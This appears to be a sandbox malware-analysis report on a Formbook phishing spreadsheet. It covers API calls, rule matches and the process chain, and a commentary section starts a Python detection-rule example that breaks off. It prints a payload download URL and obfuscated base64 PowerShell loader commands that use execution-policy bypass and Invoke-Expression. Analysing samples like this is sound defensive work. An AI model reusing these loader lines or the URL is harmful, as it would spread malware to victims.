Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 27_2_00A6FD5C NtEnumerateKey, 27_2_00A6FD5C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 27_2_00A6FEA0 NtReadVirtualMemory, 27_2_00A6FEA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 27_2_00A6FED0 NtAdjustPrivilegesToken, 27_2_00A6FED0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 27_2_00A6FE24 NtWriteVirtualMemory, 27_2_00A6FE24
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 27_2_00A6FFB4 NtCreateSection, 27_2_00A6FFB4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 27_2_00A6FFFC NtCreateProcessEx, 27_2_00A6FFFC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 27_2_00A6FF34 NtQueueApcThread, 27_2_00A6FF34
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_000007FE89AA34CE 8_2_000007FE89AA34CE
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_000007FE89AA6FBE 8_2_000007FE89AA6FBE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 27_2_00401978 27_2_00401978
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 27_2_00403060 27_2_00403060
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 27_2_004011F0 27_2_004011F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 27_2_0042EAF3 27_2_0042EAF3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 27_2_0040239E 27_2_0040239E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 27_2_004023A0 27_2_004023A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 27_2_0040FC6A 27_2_0040FC6A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 27_2_0040FC73 27_2_0040FC73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 27_2_00402C11 27_2_00402C11
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 27_2_00416623 27_2_00416623
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 27_2_00416622 27_2_00416622
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 27_2_0040FE93 27_2_0040FE93
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 27_2_0040DF13 27_2_0040DF13
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 27_2_004027C0 27_2_004027C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 27_2_004027BC 27_2_004027BC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 27_2_00A7E0C6 27_2_00A7E0C6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 27_2_00A7E2E9 27_2_00A7E2E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 27_2_00B263BF 27_2_00B263BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 27_2_00AA63DB 27_2_00AA63DB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 27_2_00A82305 27_2_00A82305
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 27_2_00ACA37B 27_2_00ACA37B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 27_2_00B0443E 27_2_00B0443E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 27_2_00B005E3 27_2_00B005E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 27_2_00A9C5F0 27_2_00A9C5F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 27_2_00AC6540 27_2_00AC6540
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 27_2_00A84680 27_2_00A84680
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 27_2_00A8E6C1 27_2_00A8E6C1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 27_2_00B22622 27_2_00B22622
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 27_2_00ACA634 27_2_00ACA634
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 27_2_00A8C7BC 27_2_00A8C7BC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 27_2_00AA286D 27_2_00AA286D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 27_2_00A8C85C 27_2_00A8C85C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 27_2_00A829B2 27_2_00A829B2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 27_2_00B2098E 27_2_00B2098E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 27_2_00B149F5 27_2_00B149F5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 27_2_00A969FE 27_2_00A969FE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 27_2_00ACC920 27_2_00ACC920
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 27_2_00B2CBA4 27_2_00B2CBA4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 27_2_00B06BCB 27_2_00B06BCB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 27_2_00B22C9C 27_2_00B22C9C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 27_2_00B0AC5E 27_2_00B0AC5E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 27_2_00AB0D3B 27_2_00AB0D3B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 27_2_00A8CD5B 27_2_00A8CD5B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 27_2_00AB2E2F 27_2_00AB2E2F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 27_2_00A9EE4C 27_2_00A9EE4C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 27_2_00B1CFB1 27_2_00B1CFB1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 27_2_00AF2FDC 27_2_00AF2FDC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 27_2_00A90F3F 27_2_00A90F3F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 27_2_00AAD005 27_2_00AAD005
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 27_2_00AFD06D 27_2_00AFD06D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 27_2_00A83040 27_2_00A83040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 27_2_00A9905A 27_2_00A9905A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 27_2_00B0D13F 27_2_00B0D13F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 27_2_00B21238 27_2_00B21238
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 27_2_00A7F3CF 27_2_00A7F3CF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 27_2_00A87353 27_2_00A87353
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 27_2_00A91489 27_2_00A91489
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 27_2_00AB5485 27_2_00AB5485
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 27_2_00ABD47D 27_2_00ABD47D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 27_2_00B235DA 27_2_00B235DA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 27_2_00A8351F 27_2_00A8351F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 27_2_00B0579A 27_2_00B0579A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 27_2_00AB57C3 27_2_00AB57C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 27_2_00B1771D 27_2_00B1771D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 27_2_00B1F8EE 27_2_00B1F8EE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 27_2_00AFF8C4 27_2_00AFF8C4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 27_2_00B05955 27_2_00B05955
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 27_2_00B0394B 27_2_00B0394B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 27_2_00B33A83 27_2_00B33A83
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 27_2_00B0DBDA 27_2_00B0DBDA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 27_2_00A7FBD7 27_2_00A7FBD7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 27_2_00AA7B00 27_2_00AA7B00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 27_2_00B1FDDD 27_2_00B1FDDD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 27_2_00B0BF14 27_2_00B0BF14
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 27_2_00AADF7C 27_2_00AADF7C
Source: PO#BBGR2411PO69.xls OLE indicator, VBA macros: true
Source: 09230000.0.dr OLE indicator, VBA macros: true
Source: PO#BBGR2411PO69.xls Stream path 'MBD007009DC/\x1Ole' : https://linkjago.me/RHCYXp?&damage=nasty &briefs=momentous&highlight=delicious&middleman=magenta&spankE(A+CFT5i!Y0cPBGlxDbP6MnI5*<OzfDTjcjZj9KlFjg0moZTAleAHFRL4t3bpRDluPm3zaP7HzlmDSjESavhbsM9KXzyJuhmq2bYTjtubWGqYHE98z2enDU0Y6P1shcJeXMMPegTWHieCzdEcNssRywsQR07ZfjSuSrnpZxSRuvb6NAoactyurh6FsufMg2oT66wMrco6iNu7ZSguG3eLrlSEfslw0XSJI0we6q7Zf7ksjm1ugtNf7L28dBapn5dumfkruiC4PaHeEoT0hNcZwUWtW1tn]MBRO25
Source: 09230000.0.dr Stream path 'MBD007009DC/\x1Ole' : https://linkjago.me/RHCYXp?&damage=nasty &briefs=momentous&highlight=delicious&middleman=magenta&spankE(A+CFT5i!Y0cPBGlxDbP6MnI5*<OzfDTjcjZj9KlFjg0moZTAleAHFRL4t3bpRDluPm3zaP7HzlmDSjESavhbsM9KXzyJuhmq2bYTjtubWGqYHE98z2enDU0Y6P1shcJeXMMPegTWHieCzdEcNssRywsQR07ZfjSuSrnpZxSRuvb6NAoactyurh6FsufMg2oT66wMrco6iNu7ZSguG3eLrlSEfslw0XSJI0we6q7Zf7ksjm1ugtNf7L28dBapn5dumfkruiC4PaHeEoT0hNcZwUWtW1tn]MBRO25
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: String function: 00A7E2A8 appears 60 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: String function: 00A7DF5C appears 137 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: String function: 00AEF970 appears 84 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: String function: 00AC373B appears 253 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: String function: 00AC3F92 appears 132 times
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: 27.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 27.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000001B.00000002.509298031.0000000000180000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000001B.00000002.509601721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: powershell.exe PID: 3108, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 3512, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: classification engine Classification label: mal100.phis.troj.expl.evad.winXLS@31/36@11/4
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Desktop\09230000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVR8796.tmp
Source: PO#BBGR2411PO69.xls OLE indicator, Workbook stream: true
Source: 09230000.0.dr OLE indicator, Workbook stream: true
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestmagicalthignsgivegoodfo.vbS"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write (UTF-16 console buffer, readable fragments only): "that the path is correct and try again"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: "At line:1 char:1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: "+ ~~~~~~~~~~~~~~~~~~~~~~~~~~"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: "ng) [], CommandNotFoundException"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: "True"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: .........................................<......}..w............(.^......(.l.....s......(.P.....................................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................Cm......................-).l....}..w.....<......\.......................(.P.....................8...............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: .........................................<......}..w............(.^......(.l.....s......(.P.....................................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................................t.h.a.t. .t.h.e. .p.a.t.h. .i.s. .c.o.r.r.e.c.t. .a.n.d. .t.r.y. .a.g.a.i.n.............N.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.(.^......(.l.....s......(.P............................. .......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: .........................................<......}..w............(.^......(.l.....s......(.P.....................................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................................+. .~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.(.P.............................8.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: .........................................<......}..w............(.^......(.l.....s......(.P.....................................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................................ . . .n.g.). .[.].,. .C.o.m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n...................F.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: .........................................<......}..w............(.^......(.l.....s......(.P.............................l.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................................ ........<......}..w............(.^......(.l.....s......(.P.....................................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: .................<..............0. ......Wl.....}..w....8.......@E......^...............(.P.....................................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: .................<.......................Wl.....}..w....8.......@E......^...............(.P.....................................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: .................P..............T.r.u.e...m..............................................................3......................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................h(........................m.....}..w......m......................1......(.P............. .......................................
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA Jump to behavior
Source: C:\Windows\System32\mshta.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\mshta.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\mshta.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\mshta.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\mshta.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\mshta.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\mshta.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\mshta.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: PO#BBGR2411PO69.xls Virustotal: Detection: 7%
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe -Embedding
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/c pOWeRsHElL -EX bypaSs -nOP -W 1 -C DEVICEcReDenTialDePlOYMeNt ; INvOke-ExpREsSioN($(INvoKe-EXpREssion('[sYSTEM.tExt.ENCodIng]'+[cHaR]58+[cHAr]58+'utF8.gETsTrIng([sYSTEm.coNvErt]'+[CHaR]58+[ChAr]0X3A+'fromBaSe64striNg('+[ChaR]34+'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'+[CHaR]0X22+'))')))"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOWeRsHElL -EX bypaSs -nOP -W 1 -C DEVICEcReDenTialDePlOYMeNt ; INvOke-ExpREsSioN($(INvoKe-EXpREssion('[sYSTEM.tExt.ENCodIng]'+[cHaR]58+[cHAr]58+'utF8.gETsTrIng([sYSTEm.coNvErt]'+[CHaR]58+[ChAr]0X3A+'fromBaSe64striNg('+[ChaR]34+'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'+[CHaR]0X22+'))')))"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\r3q12jmu\r3q12jmu.cmdline"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESC5BF.tmp" "c:\Users\user\AppData\Local\Temp\r3q12jmu\CSC7CCBE632744241EDA0AD204CE9F5FD7D.TMP"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestmagicalthignsgivegoodfo.vbS"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $caviloso = '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';$bernarda = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($caviloso));Invoke-Expression $bernarda
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe -Embedding
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/c pOWeRsHElL -EX bypaSs -nOP -W 1 -C DEVICEcReDenTialDePlOYMeNt ; INvOke-ExpREsSioN($(INvoKe-EXpREssion('[sYSTEM.tExt.ENCodIng]'+[cHaR]58+[cHAr]58+'utF8.gETsTrIng([sYSTEm.coNvErt]'+[CHaR]58+[ChAr]0X3A+'fromBaSe64striNg('+[ChaR]34+'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'+[CHaR]0X22+'))')))"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOWeRsHElL -EX bypaSs -nOP -W 1 -C DEVICEcReDenTialDePlOYMeNt ; INvOke-ExpREsSioN($(INvoKe-EXpREssion('[sYSTEM.tExt.ENCodIng]'+[cHaR]58+[cHAr]58+'utF8.gETsTrIng([sYSTEm.coNvErt]'+[CHaR]58+[ChAr]0X3A+'fromBaSe64striNg('+[ChaR]34+'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'+[CHaR]0X22+'))')))"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xmqw35tj\xmqw35tj.cmdline"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES1610.tmp" "c:\Users\user\AppData\Local\Temp\xmqw35tj\CSCD4982987C63C4803AF625DBF77F42E41.TMP"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestmagicalthignsgivegoodfo.vbS"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $caviloso = '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';$bernarda = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($caviloso));Invoke-Expression $bernarda
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
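The process creations above form one chain: EXCEL.EXE starts mshta.exe, mshta.exe runs a case-mangled, base64-wrapped PowerShell one-liner through cmd.exe, that PowerShell compiles a C# P/Invoke stub with csc.exe (the .cmdline file under %TEMP% is the Add-Type artifact), drops a .vbS under %APPDATA% and runs it with wscript.exe, the script starts a second PowerShell that decodes a further base64 stage, and that PowerShell finally starts aspnet_compiler.exe with no arguments at all, which is the injection target rather than a build step. The following is an added example and not part of the Joe Sandbox report: a small Python rule set of the kind the Sigma detections express, applied to the chain as constructed process-creation events. Image paths and arguments are copied from the lines above with the base64 blobs abbreviated; the ProcessEvent structure, the rule names and the sets of Office and .NET host binaries are my own assumptions.

```python
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcessEvent:
    parent: str    # parent image path
    image: str     # child image path
    cmdline: str   # child command line


EXCEL = r"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE"
MSHTA = r"C:\Windows\System32\mshta.exe"
CMD = r"C:\Windows\System32\cmd.exe"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
WSCRIPT = r"C:\Windows\System32\wscript.exe"
CSC = r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"
ASPNET = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"

# Constructed from the "Process created" lines of the report; the base64 arguments
# are shortened to "..." because no rule below needs them.
EVENTS = [
    ProcessEvent(EXCEL, MSHTA, "C:\\Windows\\System32\\mshta.exe -Embedding"),
    ProcessEvent(MSHTA, CMD, '"C:\\Windows\\system32\\cmd.exe" "/c pOWeRsHElL -EX bypaSs -nOP -W 1 -C '
                 "DEVICEcReDenTialDePlOYMeNt ; INvOke-ExpREsSioN($(INvoKe-EXpREssion('...fromBaSe64striNg(...)')))\""),
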